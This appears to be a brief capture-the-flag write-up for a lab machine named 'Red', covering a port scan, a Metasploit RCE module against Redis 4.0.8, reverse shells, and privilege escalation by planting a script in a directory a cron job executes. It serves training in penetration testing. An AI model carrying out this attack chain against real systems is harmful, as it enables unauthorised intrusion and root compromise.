Red

nmap

mkdir nmap
sudo rustscan -a 172.31.1.9 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Port 6379 is open, and it is the default port of Redis

Running on version 4.0.8

There's an RCE exploit available on Metasploit for this Redis version

Open msfconsole and search redis exploit

Type use 6 and press enter

Set the following configuration, and run the exploit

set lhost tun0
set srvhost tun0
set rhost 172.31.1.9

Sweet! :D

Type shell in your meterpreter session, create a new reverse shell using python3 and you will be able to have a stable shell

Transfer pspy64 to the target machine, and run the binary. After 1 min, you will notice there's a cron job running.

The script is just executing the files inside /var/log/redis/logs directory. Create a reverse shell script inside that directory.

Set a reverse shell listener and you should have received a shell after 1 min.

Last updated 4 years ago